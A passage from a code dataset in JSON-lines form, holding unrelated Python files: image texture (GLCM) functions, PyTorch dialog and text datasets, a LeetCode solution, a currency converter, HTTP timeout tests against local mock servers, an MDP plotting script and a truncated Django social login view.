total=int(sum(sum(matriz)))\r\n# print(total)\r\n matrizCoocurrenciaProbabilidades = matriz/total\r\n# print(matrizCoocurrenciaProbabilidades)\r\n# print(sum(sum(matrizCoocurrenciaProbabilidades)))\r\n return matrizCoocurrenciaProbabilidades\r\n\r\n\r\n\r\n\r\ndef convierte_lab(imagen):\r\n # img = cv2.imread(imagen) \r\n img = cv2.cvtColor(imagen, cv2.COLOR_RGB2BGR)\r\n img = cv2.cvtColor(imagen, cv2.COLOR_BGR2LAB)\r\n return img\r\n\r\ndef kmeans_cluster(fichero,colores):\r\n# img = np.asarray(Image.open(fichero))\r\n img=fichero\r\n Z = img.reshape((-1,1))\r\n# print(Z.shape)\r\n Z = np.float32(Z)\r\n criterios = (cv2.TERM_CRITERIA_EPS, 20000, 0.001)\r\n K = colores\r\n ret,label,centroides=cv2.kmeans(Z,K,None,criterios,10,cv2.KMEANS_RANDOM_CENTERS)\r\n centroides = np.uint8(centroides)\r\n res = centroides[label.flatten()]\r\n res2 = res.reshape((img.shape))\r\n# print(\"Tamaño del conjunto de centroides \",len(centroides))\r\n# print(centroides)\r\n# print(np.unique(centroides))\r\n# print(\"Tamaño del conjunto de etiquetas \",len(label))\r\n# print(label)\r\n# print(\"Valores etiquetas \",np.unique(label))\r\n# return res2\r\n return label.reshape((img.shape))\r\n \r\ndef kmeans_cluster_centroides(imagen,colores):\r\n# img = np.asarray(Image.open(fichero))\r\n #img=fichero\r\n #Z = np.vstack(lista)\r\n# print(Z.shape)\r\n #Z = np.reshape(imagen,(-1,3))\r\n Z = imagen.reshape(-1,3)\r\n #print(Z.shape)\r\n Z = np.float32(Z)\r\n criterios = (cv2.TERM_CRITERIA_EPS, 200000, 0.001)\r\n K = colores\r\n ret,label,centroides=cv2.kmeans(Z,K,None,criterios,100,cv2.KMEANS_RANDOM_CENTERS)\r\n centroides = np.uint8(centroides)\r\n res = centroides[label.flatten()]\r\n res2 = res.reshape((imagen.shape))\r\n# print(\"Tamaño del conjunto de centroides \",len(centroides))\r\n# print(centroides)\r\n# print(np.unique(centroides))\r\n# print(\"Tamaño del conjunto de etiquetas \",len(label))\r\n# print(label)\r\n# print(\"Valores etiquetas \",np.unique(label))\r\n# return res2\r\n return centroides \r\n\r\ndef calcula_varias_matrices_GLCM(valores,imagen,matrices):\r\n print(\"Valores en la imagen:\",np.unique(imagen))\r\n hitsCoocurrencia = np.zeros((valores,valores,len(matrices)))\r\n hImagen,wImagen = imagen.shape[:2]\r\n for i in range(hImagen):\r\n for j in range(wImagen):\r\n for k,matriz in enumerate(matrices):\r\n hMatriz,wMatriz = matriz.shape[:2]\r\n if hImagen-int(hMatriz) >=0 and wImagen-int(wMatriz) >=0 \\\r\n and hImagen>=int(i+hMatriz) and wImagen>=int(j+wMatriz):\r\n # print(i,j,hMatriz,wMatriz,i,j)\r\n ventanaImagen = imagen[i:hMatriz+i,j:wMatriz+j]\r\n matrizSobreImagen = matriz*ventanaImagen\r\n valoresCoocurrencia = matrizSobreImagen[np.nonzero(matriz)]\r\n hitsCoocurrencia[int(valoresCoocurrencia[0]),int(valoresCoocurrencia[1]),k]+=int(1)\r\n np.savetxt('coocurrencia1.txt',hitsCoocurrencia[:,:,0],fmt='%i')\r\n return hitsCoocurrencia\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef calcula_matriz_coocurrencia(valores,imagen,matriz):\r\n #valores es la cantidad de colores que podría haber diferentes en este plano de la imagen\r\n hitsCoocurrencia = np.zeros((valores,valores))\r\n vdiferentes = np.unique(imagen)\r\n \r\n# print(hitsCoocurrencia.shape)\r\n hImagen,wImagen = imagen.shape[:2]\r\n hMatriz,wMatriz = matriz.shape[:2]\r\n # print(hImagen,wImagen,hMatriz,wMatriz)\r\n for i in range(hImagen-hMatriz):\r\n for j in range(wImagen-wMatriz):\r\n ventanaImagen = imagen[i:hMatriz+i,j:wMatriz+j]\r\n matrizSobreImagen=matriz*ventanaImagen\r\n valoresCoocurrencia = matrizSobreImagen[np.nonzero(matriz)]\r\n #print(\"valores coocurrencia\",valoresCoocurrencia)\r\n# if(valoresCoocurrencia[0]==0):\r\n# print(valoresCoocurrencia)\r\n # int(valoresCoocurrencia[0])\r\n# print(valoresCoocurrencia)\r\n hitsCoocurrencia[int(np.where(vdiferentes==valoresCoocurrencia[0])[0]),\r\n int(np.where(vdiferentes==valoresCoocurrencia[1])[0])]+=1\r\n # print(hitsCoocurrencia)\r\n return hitsCoocurrencia\r\n\r\ndef genera_regla(tama,angulo):\r\n matriz = np.zeros((tama,tama))\r\n# print(int(np.ceil(tama/2)))\r\n matriz[int(np.ceil(tama/2))-1,int(np.ceil(tama/2))-1]=1\r\n if(angulo==0):\r\n matriz[int(np.ceil(tama/2))-1,tama-1]=1\r\n if(angulo==180):\r\n matriz[int(np.ceil(tama/2))-1,0]=1\r\n if(angulo==-90):\r\n matriz[tama-1,int(np.ceil(tama/2))-1]=1\r\n if(angulo==90):\r\n matriz[0,int(np.ceil(tama/2))-1]=1\r\n if(angulo==45):\r\n matriz[0,tama-1]=1\r\n if(angulo==135):\r\n matriz[0,0]=1\r\n if(angulo==225):\r\n matriz[tama-1,0]=1\r\n if(angulo==-45 or angulo==315):\r\n matriz[tama-1,tama-1]=1\r\n \r\n# print(matriz) \r\n return matriz\r\n\r\ndef datos_imagen_grey(imagen,valores_cuantizacion):\r\n print(\"===================\")\r\n plt.figure\r\n hist,n = np.histogram(imagen,range(valores_cuantizacion),[0,valores_cuantizacion-1])\r\n plt.plot(n[1:],hist)\r\n plt.xlim([0,valores_cuantizacion])\r\n indice2=0\r\n for i in n[1:-1]:\r\n# print(hist[i])\r\n if(hist[i]!=0):\r\n b=np.ones(hist[i])*int(i)\r\n# print(b)\r\n if(indice2==0):\r\n indice2=1\r\n a=b\r\n else:\r\n indice2+=1\r\n a=np.concatenate([a,b]) \r\n\r\n media = np.mean(a)\r\n desviacionTipica = np.sqrt(np.var(a))\r\n skewness = skew(a)\r\n\r\n print(\"La media de los valores de intensidad es: \",media)\r\n print(\"La desviación típica es: \",desviacionTipica)\r\n print(\"La asimetría estadística (skewness) es: \",skewness)\r\n \r\n plt.axvline(media,linestyle='dashed',linewidth=2) \r\n print(\"===================\")\r\n plt.show()\r\n \r\ndef datos_imagen(imagen):\r\n color = ('r','g','b')\r\n print(\"===================\")\r\n for i, colo in enumerate(color):\r\n plt.figure\r\n hist,n = np.histogram(imagen[:,:,i],range(256),[0,255])\r\n plt.plot(n[1:],hist,color = colo)\r\n plt.xlim([0,256])\r\n\r\n indice2=0\r\n for i in n[1:-1]:\r\n # print(hist[i])\r\n if(hist[i]!=0):\r\n b=np.ones(hist[i])*int(i)\r\n # print(b)\r\n if(hist[i]!=0):\r\n if(indice2==0):\r\n indice2=1\r\n a=b\r\n else:\r\n indice2+=1\r\n a=np.concatenate([a,b]) \r\n\r\n media = np.mean(a)\r\n desviacionTipica = np.sqrt(np.var(a))\r\n skewness = skew(a)\r\n\r\n print(\"La media del color \",colo,\" es: \",media)\r\n print(\"La desviación típica del color \",colo,\" es: \",desviacionTipica)\r\n print(\"La asimetría estadística (skewness) del color \",colo,\" es: \",skewness)\r\n\r\n plt.axvline(media,linestyle='dashed',color = colo,linewidth=2) \r\n print(\"===================\")\r\n plt.show()\r\n","repo_name":"ManuelL4z0/dermaBCC","sub_path":"processing/other_functions.py","file_name":"other_functions.py","file_ext":"py","file_size_in_byte":16858,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70570883432","text":"import numpy as np\nfrom torch.utils.data import Dataset\n\nfrom source.utils.misc import list2tensor\nfrom source.utils.misc import Pack\n\nbert_max_len = 512\n\nclass DialogDataset(Dataset):\n \"\"\"\n DialogDataset\n \"\"\"\n def __init__(self, data):\n self.data = data\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, idx):\n return self.data[idx]\n\n\nclass DialogBatcher(object):\n\n def __init__(self, batch_size, data_type=\"train\", shuffle=False):\n self.batch_size = batch_size\n self.data_type = data_type\n self.shuffle = shuffle\n\n self.batch_data_list = []\n self.batch_size_list = []\n self.n_batch = None \n self.n_rows = None \n\n def __len__(self):\n return self.n_rows\n\n def prepare_epoch(self):\n if self.shuffle:\n np.random.shuffle(self.batch_data_list)\n\n def get_batch(self, batch_idx):\n local_data = self.batch_data_list[batch_idx]\n batch_data = self.create_batches(local_data)\n return batch_data\n\n def prepare_input_list(self, input_data_list):\n if self.shuffle:\n np.random.shuffle(input_data_list)\n\n self.n_rows = remain_rows = len(input_data_list)\n while remain_rows > 0:\n self.batch_data_list.append({})\n active_size = min(remain_rows, self.batch_size)\n self.batch_size_list.append(active_size)\n remain_rows -= active_size\n self.n_batch = len(self.batch_size_list)\n\n for batch_idx in range(self.n_batch):\n st_idx = batch_idx * self.batch_size\n ed_idx = st_idx + self.batch_size\n # print(f\"st {st_idx}, en {ed_idx}\")\n local_batch_input = input_data_list[st_idx: ed_idx]\n self.batch_data_list[batch_idx] = local_batch_input\n\n print('n_rows = %d, batch_size = %d, n_batch = %d.' % (self.n_rows, self.batch_size, self.n_batch))\n\n def create_batches(self, data):\n # sort by dialog turns\n sorted_data = sorted(data, key=lambda x: x['turns'], reverse=True)\n\n conv_ids = [sample['conv_id'] for sample in sorted_data]\n turns = [sample['turns'] for sample in sorted_data]\n kbts = [sample['kbt'] for sample in sorted_data]\n max_turn = max(turns)\n inputs = []\n for t in range(max_turn):\n turn_label = []\n turn_src = []\n turn_tgt = []\n turn_kb = []\n turn_kb_gt = []\n turn_entity = []\n turn_ptr = []\n turn_kb_ptr = []\n for sample in sorted_data:\n if sample['turns'] >= t+1:\n turn_label.append(t+1)\n turn_src.append(sample['src'][t][:bert_max_len])\n turn_tgt.append(sample['tgt'][t][:bert_max_len])\n turn_kb.append(sample['kb'][t][:bert_max_len])\n turn_kb_gt.append(sample['kb_gt'][t][:bert_max_len])\n\n turn_batch_size = len(turn_src)\n conv_id = conv_ids[:turn_batch_size]\n\n assert len(turn_tgt) == turn_batch_size\n if self.data_type == \"test\":\n turn_input = {\"conv_id\": conv_id,\"turn_label\": turn_label,\"src\": turn_src,\n \"tgt\": turn_tgt,\"kb\": turn_kb,\"kb_gt\": turn_kb_gt}\n else:\n turn_input = {\"conv_id\": conv_id, \"turn_label\": turn_label, \"src\": turn_src, \n \"tgt\": turn_tgt, \"kb\": turn_kb, \"kb_gt\": turn_kb_gt}\n inputs.append(turn_input)\n \n batch_data = {\"max_turn\": max_turn,\"inputs\": inputs, \"kbts\": kbts}\n '''for i in kbts:\n print('batcher kbt', i[:10])\n print('\\n')'''\n return batch_data\n\n\ndef create_turn_batch(data_list):\n \"\"\"\n create_turn_batch\n \"\"\"\n turn_batches = []\n for data_dict in data_list:\n batch = Pack()\n for key in data_dict.keys():\n if key in ['src', 'tgt', 'kb', 'kb_gt', 'ptr_index', 'kb_index']:\n batch[key] = list2tensor([x for x in data_dict[key]])\n else:\n batch[key] = data_dict[key]\n turn_batches.append(batch)\n return turn_batches\n\ndef create_kb_batch(kb_list):\n \"\"\"\n create_kb_batch\n \"\"\"\n new_kb_list = []\n for i in kb_list:\n kbt = []\n for j in i:\n if len(j) == 6:\n del j[2]\n elif len(j) == 7:\n #print(j)\n del j[2:4]\n if len(j) == 5:\n kbt.append(j)\n new_kb_list.append(kbt)\n kb_batches = list2tensor(new_kb_list)\n #print(kb_batches)\n return kb_batches","repo_name":"deekshaVarshney/CNTF","sub_path":"source/inputter/batcher.py","file_name":"batcher.py","file_ext":"py","file_size_in_byte":4683,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"72940696872","text":"import re\nimport torch\nimport random\nimport numpy as np\nimport unidecode as ud\nfrom torchvision import transforms\nfrom torch.utils.data import Dataset\n\n\nclass Mobydick(Dataset):\n\n def __init__(self, file_path, min_len=4, transform=None):\n\n # Load data\n with open(file_path, 'r') as file:\n text = file.read()\n\n ## Text preprocessing\n # Remove non-unicode characters\n text = ud.unidecode(text)\n # Lowarcase\n text = text.lower()\n # Remove single newlines\n text = re.sub(r'(?= min_len:\n # Substitute entire sentence with splited one\n sentences_clean.append(tokens)\n # Save words\n words.extend(tokens)\n\n # Store words\n self.words = set(words)\n # Store sentences\n self.sentences = sentences_clean\n # Store sentences transformation pipeline\n self.transform = transform\n\n def __len__(self):\n\n return len(self.sentences)\n\n def __getitem__(self, i):\n\n # Case index i is greater or equal than number of sequences\n if i >= len(self.sentences):\n # Raise key error\n raise IndexError('Chosen index exceeds sentences indices')\n\n # Case transform is not set\n if self.transform is None:\n # Just return i-th sentence\n return self.sentences[i]\n\n # Otherwise, transform it and return transformation result\n return self.transform(self.sentences[i])\n\n\nclass Bible(Dataset):\n\n def __init__(self, file_path, min_len=4, transform=None):\n\n # Load data\n with open(file_path, 'r') as file:\n text = file.read()\n\n ## Text preprocessing\n # Remove non-unicode characters\n text = ud.unidecode(text)\n # Lowercase\n text = text.lower()\n # Remove single newlines\n text = re.sub(r'(?= min_len:\n # Substitute entire sentence with splited one\n sentences_clean.append(tokens)\n # Save words\n words.extend(tokens)\n\n # Store words\n self.words = set(words)\n # Store sentences\n self.sentences = sentences_clean\n # Store sentences transformation pipeline\n self.transform = transform\n\n def __len__(self):\n\n return len(self.sentences)\n\n def __getitem__(self, i):\n\n # Case index i is greater or equal than number of sequences\n if i >= len(self.sentences):\n # Raise key error\n raise IndexError('Chosen index exceeds sentences indices')\n\n # Case transform is not set\n if self.transform is None:\n # Just return i-th sentence\n return self.sentences[i]\n\n # Otherwise, transform it and return transformation result\n return self.transform(self.sentences[i])\n\n\ndef split_train_test(dataset, train_prc=0.8):\n\n # Define dataset length\n n = len(dataset)\n # Define number of training dataset indices\n m = round(train_prc * n)\n # Split datasets in two\n return torch.utils.data.random_split(dataset, [m, n - m])\n\nclass OneHotEncode(object):\n\n def __init__(self, words):\n # Store list of words\n self.words = set(words)\n # Define mapping from words to integers\n self.encoder = {e: i for i, e in enumerate(words)}\n # Define mapping from integers to words\n self.decoder = {i: e for i, e in enumerate(words)}\n\n def __call__(self, sentence):\n # For each word in sentence, map it to vector\n encoded = [\n # Make a vector: set 1 only where index is equal to word number, 0 otherwise\n [ int(i == word_index) for i in range(len(self.words)) ]\n # Loop on word indices\n for word_index in sentence\n ]\n # Return one hot encoded sentence\n return encoded\n\n def decode(self, sentence):\n \"\"\"\n Input: list of binary lists (one hot encodings)\n Output: list of words (strings)\n \"\"\"\n # Map each inner list into a word text\n words = [ self.decoder[np.argmax(ohe)] for ohe in sentence ]\n return words\n\n\n\nclass WordToIndex(object):\n\n def __init__(self, words):\n # Store list of words\n self.words = set(words)\n # Define mapping from words to integers\n self.encoder = {e: i for i, e in enumerate(words)}\n # Define mapping from integers to words\n self.decoder = {i: e for i, e in enumerate(words)}\n\n # Return word as its index\n def __call__(self, sentence):\n # Make list of labels from words\n labels = [self.encoder[w] for w in sentence if w in self.words]\n # Return list of labels\n return labels\n\n # Return vector of indices as its corresponding words\n def decode(self, sentence):\n # Make list of words from labels\n words = [self.decoder[i] for i in sentence if i in self.decoder.keys()]\n # retrun list of words\n return words\n\n\nclass RandomCrop(object):\n\n # Constructor\n def __init__(self, crop_len):\n # Store crop length\n self.crop_len = crop_len\n\n def __call__(self, sentence):\n\n # Check for compatibility of crop length with sentence length\n if len(sentence) < self.crop_len:\n # Raise new index error\n raise IndexError(' '.join([\n 'Error: given crop length is {:d}'.format(self.crop_len),\n 'while current sentence length is {:d}:'.format(len(sentence)),\n 'crop length must be smaller or equal than sentence length'\n ]))\n\n # Define start annd end index of crop window, at random\n i = random.randint(0, len(sentence) - self.crop_len)\n j = i + self.crop_len\n # Take a subset of coriginal sentence\n sentence = sentence[i:j]\n # Return subset\n return sentence\n\n\nclass ToTensor(object):\n\n def __call__(self, sentence):\n\n return torch.tensor(sentence).float()\n","repo_name":"liacov/homework3_nndl","sub_path":"modules/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":8012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24889842919","text":"from datetime import date, time\nimport datetime\n\nday_of_week = [\"Mon\", \"Tues\", \"Wed\", \"Thurs\", \"Fri\", \"Sat\", \"Sun\"]\n#initialize the dates\nnow = datetime.datetime.now()\ntoday = date.today()\n\n#Date in the month,day year\nLocalDate = today.strftime(\"%b-%d-%Y\")\n#Localtime Now\ntimenow = now.strftime(\"%I:%M %p\").lstrip('0')\n#Day of the Week\ndays = str(day_of_week[datetime.datetime.today().weekday()])\nDate_phil = LocalDate + \" \" + timenow + \" \" + days\nprint(Date_phil)\n","repo_name":"androidRollin/QR-Code-Attendance-Registry-System","sub_path":"DateandTime.py","file_name":"DateandTime.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42203732107","text":"\"\"\"\n https://leetcode-cn.com/problems/reorder-list/\n https://leetcode-cn.com/problems/reorder-list/solution/zhong-pai-lian-biao-by-leetcode-solution/\n \n 1.链表不能直接用下标访问,先遍历链表,将节点有顺序的放在list中,再利用双指针即可\n\"\"\"\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def reorderList(self, head: ListNode) -> None:\n \"\"\"\n Do not return anything, modify head in-place instead.\n \"\"\"\n if not head:\n return \n\n node_list = []\n node = head\n while node:\n node_list.append(node)\n node = node.next\n\n i, j = 0, len(node_list) - 1\n while i < j:\n tmp = node_list[i].next\n node_list[i].next = node_list[j]\n # 此时的i指向下一个节点\n i = i + 1\n # 若此时相遇则跳出\n if i == j:\n break\n node_list[j].next = tmp\n j = j - 1\n\n node_list[i].next = None\n","repo_name":"zhouyang412/myleetcode","sub_path":"链表数组/143. 重排链表.py","file_name":"143. 重排链表.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11203884101","text":"dolar = 718.17\ncambio = input(\"Quieres convertir de CLP a Dólar [C] o de Dólar a CLP [D]?: \")\nif cambio.upper() == \"C\" or cambio.upper() == \"D\":\n if cambio.upper() == \"C\":\n moneda = input(\"Ingresa cantidad de CLP que quieres convertir a dólar: \")\n calculo = int(moneda) / dolar\n print(\"La cantidad ingresada en pesos chilenos ($\"+str(moneda)+\") equivale a $\"+str(round(calculo,2))+\" dólares\")\n elif cambio.upper() == \"D\":\n moneda = input(\"Ingresa cantidad de dólares que quieres convertir a CLP: \")\n calculo = float(moneda) * int(dolar)\n print(\"La cantidad ingresada en dólares ($\"+str(moneda)+\") equivale a $\"+str(round(calculo))+\" CLP\")\nelse:\n print(\"Has ingresado un dato incorrecto, vuelve a intentarlo\")","repo_name":"nicontrerasi/conversor","sub_path":"conversor.py","file_name":"conversor.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"140355259","text":"# -*- coding: utf-8 -*-\n\n\"\"\"Проверка обработки таймаута на TCP-соединение.\n\nВ этом наборе тестов принимается, что боевой чёрный ящик *не* доступен с\nтестовой машины, а именно, все соединения с ним таймаутятся.\n\"\"\"\n\nimport socket\nimport time\nimport threading\nimport unittest\nimport six\n\nfrom six.moves import BaseHTTPServer, http_client\n\nimport blackbox\n\n\n# Делается две попытки доступа, поэтому реальный таймаут таков:\nTIMEOUT = 2 * blackbox.HTTP_TIMEOUT + 0.5\nUSER_IP = '127.0.0.1'\n\n\ndef start_server_with_retries(port, num_retries, timeout=None):\n \"\"\"Запускает мок-сервер, первые num_retries-1 возвращающий ошибку\n (если timeout == None) или возвращающий ответ с таймаутом.\n В последний раз ответ отдаётся без таймаута и без ошибки.\n\n Сервер будет слушать на 127.0.0.1 на порту `port`. Он ответит на\n `num_requests` запросов и завершится.\n \"\"\"\n class ServerThread(threading.Thread):\n def run(self):\n class MockHandler(BaseHTTPServer.BaseHTTPRequestHandler):\n request_count = 0\n\n def do(self):\n self.__class__.request_count = self.request_count + 1\n if self.__class__.request_count == num_retries:\n self.send_response(200)\n self.send_header(b'Content-Type', b'text/xml')\n self.end_headers()\n self.wfile.write(b'''\n \n 57614307\n 0\n test-test\n \n test.test\n \n ''')\n return\n if not timeout:\n self.send_response(500)\n else:\n time.sleep(timeout)\n\n do_GET = do_HEAD = do_POST = do_PUT = do_DELETE = do_OPTIONS \\\n = do_TRACE = do\n svr = BaseHTTPServer.HTTPServer(('127.0.0.1', port), MockHandler)\n for i in range(num_retries):\n svr.handle_request()\n\n ServerThread().start()\n time.sleep(0.1) # даём серверу время подняться\n def server_killer():\n # добиваем не до конца отработавшие сервера\n time.sleep(5)\n con = http_client.HTTPConnection('localhost', port)\n for _ in range(num_retries):\n try:\n con.request('GET', '')\n con.getresponse()\n except:\n return\n threading.Thread(target=server_killer).start()\n\n\nclass TestBlackboxTimeOut(unittest.TestCase):\n def test_connect_timeout(self):\n \"\"\"Таймаут при установке TCP-соединения.\"\"\"\n # Надеюсь никто не слушает этот порт :)\n blackbox.BLACKBOX_URL = 'http://127.0.0.1:12321/blackbox/'\n time1 = time.time()\n try:\n blackbox.userinfo('test', USER_IP)\n except blackbox.BlackboxError:\n\n import traceback\n print(traceback.print_exc())\n time2 = time.time()\n self.assertAlmostEqual(time2 - time1, blackbox.HTTP_TIMEOUT + 0.5, 0)\n except Exception as ex:\n self.fail('ожидали BlackboxError, получили %s' % ex)\n\n def test_read_timeout(self):\n \"\"\"Таймаут при чтении HTTP-ответа.\"\"\"\n sock = socket.socket()\n port = 8765\n if six.PY3:\n port = 8766\n sock.bind(('127.0.0.1', port))\n sock.listen(1)\n blackbox.BLACKBOX_URL = 'http://127.0.0.1:{}/blackbox/'.format(port)\n time1 = time.time()\n try:\n blackbox.userinfo('test', USER_IP)\n except blackbox.BlackboxError:\n time2 = time.time()\n self.assertAlmostEqual(time2 - time1, TIMEOUT, 0)\n except Exception as ex:\n self.fail('ожидали BlackboxError, получили %s' % ex)\n finally:\n sock.close()\n\n\nclass TestRetries(unittest.TestCase):\n def test_successfull_retry_error(self):\n \"\"\"Успешный повторный запрос, когда несколько первых запросов\n возвращают ошибки\"\"\"\n start_server_with_retries(8403, num_retries=3)\n b = blackbox.Blackbox(url='http://localhost:8403/', timeout=[0.5, 0.5, 0.5])\n info = b.userinfo('test-test', USER_IP, by_login=True)\n self.assertEqual(info['uid'], '57614307')\n\n def test_unsuccessfull_retry_error(self):\n \"\"\"Безуспешный повторный запрос, когда сервер возвращает ошибки\"\"\"\n start_server_with_retries(8404, num_retries=3)\n b = blackbox.Blackbox(url='http://localhost:8404/', timeout=[0.5, 0.5])\n self.assertRaises(blackbox.BlackboxError, b.userinfo, 'test-test',\n USER_IP, by_login=True)\n time.sleep(1)\n\n def test_successfull_retry_timeout(self):\n \"\"\"Успешный повторный запрос, когда сервер отвечает слишком медленно\"\"\"\n start_server_with_retries(8405, num_retries=3, timeout=1)\n b = blackbox.Blackbox(url='http://localhost:8405/', timeout=[0.5, 1, 1.5])\n info = b.userinfo('test-test', USER_IP, by_login=True)\n self.assertEqual(info['uid'], '57614307')\n\n start_server_with_retries(8406, num_retries=3, timeout=1)\n b = blackbox.Blackbox(url='http://localhost:8406/', timeout=1, retry_count=3)\n info = b.userinfo('test-test', USER_IP, by_login=True)\n self.assertEqual(info['uid'], '57614307')\n\n def test_unsuccessfull_retry_timeout(self):\n \"\"\"Безуспешный повторный запрос, когда сервер отвечает слишком медленно\"\"\"\n start_server_with_retries(8407, num_retries=4, timeout=1)\n b = blackbox.Blackbox(url='http://localhost:8407/', timeout=0.5, retry_count=3)\n self.assertRaises(blackbox.BlackboxError, b.userinfo, 'test-test',\n USER_IP, by_login=True)\n time.sleep(2)\n\n start_server_with_retries(8408, num_retries=3, timeout=1)\n b = blackbox.Blackbox(url='http://localhost:8408/', timeout=[0.5, 0.6])\n self.assertRaises(blackbox.BlackboxError, b.userinfo, 'test-test',\n USER_IP, by_login=True)\n time.sleep(2)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"library/tests/test_timeout.py","file_name":"test_timeout.py","file_ext":"py","file_size_in_byte":7365,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25064033778","text":"import kaggle\nfrom kaggle.api.kaggle_api_extended import KaggleApi\nimport os\n\n#checks if this folder exists\npath= r'C:\\Users\\RIDGE\\.kaggle'\nisExist = os.path.exists(path)\nif not isExist:\n os.makedirs(path)\n print(\".kaggle created in C:\\x5cUsers\\x5cRIDGE\\x5c\")\n \n\n#access the API\napi = KaggleApi()\napi.authenticate()\n\n#download dataset\napi.dataset_download_file('world-happiness-report-2023', 'WHR2023.csv')\n \n# test 2","repo_name":"RIDGE413/RIDGE413","sub_path":"Personal Projects/API testing/kaggle_happiness_data_api.py","file_name":"kaggle_happiness_data_api.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25276452497","text":"import argparse\nimport sys\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom pathlib import Path\n\nimport mdp.analysis.MdpData as mv\nfrom mdp.models.MdpV2 import MdpModelV2\nfrom mdp.models.MdpV3 import MdpModelV3\nfrom mdp.models.MdpV4 import MdpModelV4\n\n\ndef main(argv):\n parser = argparse.ArgumentParser(description=\"plot costs of following MDP instance optimal policy\")\n parser.add_argument(\"-m\", \"--version\", help=\"MDP model version\", type=int)\n parser.add_argument(\"-p\", \"--paramsfile\", help=\"txt file with version specific params dict\")\n parser.add_argument(\"-c\", \"--component\", help=\"see single cost component\")\n parser.add_argument(\"-a\", \"--policy\", help=\"txt file with policy as list\", default=None)\n parser.add_argument(\"-t\", \"--timerange\", help=\"see specific time range\", nargs=2, type=int, default=None)\n parser.add_argument(\"-v\", \"--techstage\", help=\"see single tech stage\", type=int, default=None)\n parser.add_argument(\"--save\", help=\"save plots as png files\", action='store_true')\n args = parser.parse_args()\n\n if int(args.version) < 2:\n print(\"error: plot_cost_component only supported for MDP V2 or higher.\")\n sys.exit(1)\n\n params_dir = Path(\"results/v{}/params\".format(args.version))\n pf = params_dir / \"p_v{}_{}.txt\".format(args.version, args.paramsfile)\n with open(pf, 'r') as paramsfile:\n params = eval(paramsfile.read())\n paramsfile.close()\n\n mdp_model = None\n if int(args.version) == 2:\n mdp_model = MdpModelV2()\n elif int(args.version) == 3:\n mdp_model = MdpModelV3()\n elif int(args.version) == 4:\n mdp_model = MdpModelV4()\n\n assert(mdp_model is not None)\n assert(mdp_model.param_names == list(params.keys()))\n mdp_fh = mdp_model.run_fh(params)\n\n if args.techstage is not None:\n if args.techstage < 0 or args.techstage >= mdp_fh.n_tech_stages:\n print(\"error: tech stage {} out of range: {}\".format(args.techstage, mdp_fh.n_tech_stages))\n sys.exit(2)\n\n if args.policy:\n policies_dir = Path(\"visuals/v{}/policies\".format(args.version))\n af = policies_dir / \"a_v{}_{}.txt\".format(args.version, args.policy)\n with open(af, 'r') as policyfile:\n arb_policy = eval(policyfile.read())\n policyfile.close()\n assert(len(arb_policy) == mdp_fh.n_years)\n policy_type = args.policy\n else:\n policy_type = \"optimal\"\n\n if args.techstage is not None:\n if args.policy:\n policy = mv.get_arb_policy_trajectory(arb_policy, args.techstage)\n else:\n policy = mv.get_opt_policy_trajectory(mdp_fh, args.techstage)\n v_str = str(args.techstage)\n else:\n policy = []\n for v in np.arange(mdp_fh.n_tech_stages):\n if args.policy:\n policy.append(mv.get_arb_policy_trajectory(arb_policy, v))\n else:\n policy.append(mv.get_opt_policy_trajectory(mdp_fh, v))\n v_str = \"all\"\n\n if args.timerange:\n t0, tN = args.timerange\n t0 = max(0, t0-1)\n if tN - t0 > mdp_fh.n_years:\n print(\"error: time range {}-{} out of range: {}\".format(t0, tN, mdp_fh.n_tech_stages))\n sys.exit(3)\n else:\n t0 = 0\n tN = mdp_fh.n_years\n\n np.set_printoptions(linewidth=300)\n visuals_dir = Path(\"visuals/v{}/plots\".format(args.version))\n\n fig_component = mv.cost_by_component_wrapper(mdp_fh, policy, policy_type, args.component, [t0, tN], v=args.techstage)\n\n if args.save:\n fig_component.savefig(visuals_dir / \"g_v{}_{}_{}_{}.png\".format(args.version, policy_type, args.component, paramsfile, v_str))\n plt.show()\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"taigereye/cs91r","sub_path":"mdp/plot_cost_component.py","file_name":"plot_cost_component.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28104387444","text":"from django.contrib.auth import login as django_login\n\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.generics import GenericAPIView\nfrom rest_framework.permissions import AllowAny\nfrom rest_framework.authtoken.models import Token\n\nfrom .serializers import SocialSerializer\nfrom ..serializers import TokenSerializer\n\nfrom .utils import get_social_auth, get_user_by_email, create_user_social, create_social_auth\n\n\nclass SocialLoginView(GenericAPIView):\n\n permission_classes = (AllowAny,)\n allowed_methods = ('POST', 'OPTIONS', 'HEAD')\n serializer_class = SocialSerializer\n response_serializer_class = TokenSerializer\n\n def get_response(self, request, token, new):\n serializer = self.response_serializer_class(instance=token, context={'request': request})\n\n if new:\n response = Response(serializer.data, status=status.HTTP_201_CREATED)\n else:\n response = Response(serializer.data, status=status.HTTP_200_OK)\n\n return response\n\n def post(self, request, *args, **kwargs):\n serializer = 